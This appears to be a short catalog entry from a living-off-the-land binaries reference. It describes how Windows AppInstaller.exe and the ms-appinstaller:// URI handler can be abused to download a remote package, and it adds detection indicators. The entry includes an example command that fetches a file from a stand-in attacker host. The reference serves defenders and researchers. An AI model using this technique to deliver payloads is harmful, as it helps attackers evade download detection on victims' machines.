Catalog DÆMON

DMN · Tool

AppInstaller.exe

1 technique WindowsDÆMON GPL-3.0

Download

NEW
File Download Windows

The ms-appinstaller:// URI is handled by the signed App Installer (AppInstaller.exe), which reaches out to the source URL, attempts to load/install the package, and caches the fetched file in INetCache. The download rides a trusted protocol handler with no obvious downloader on the command line; the same handler underpinned real-world MotW-bypass delivery campaigns.

Use Download a remote file/package through a trusted URI handler rather than an explicit HTTP client.

start ms-appinstaller://?source=https://attacker.example/x.msix
Context
user
Native
Download
MITRE
T1105
Detection
Detection: AppInstaller.exe making outbound connections to non-Microsoft hosts; ms-appinstaller:// URI invocations (e.g. via explorer/start); files appearing in INetCache attributed to AppInstaller.exe; MSIX/APPX pulled from untrusted domains.
Verified
✓ LOLBAS AppInstaller.yml quotes `start ms-appinstaller://?source={REMOTEURL:.exe}` and notes the file is 'saved in INetCache' (T1105); match. ms-appinstaller MotW-bypass abuse is publicly documented (Microsoft disabled the handler in 2023).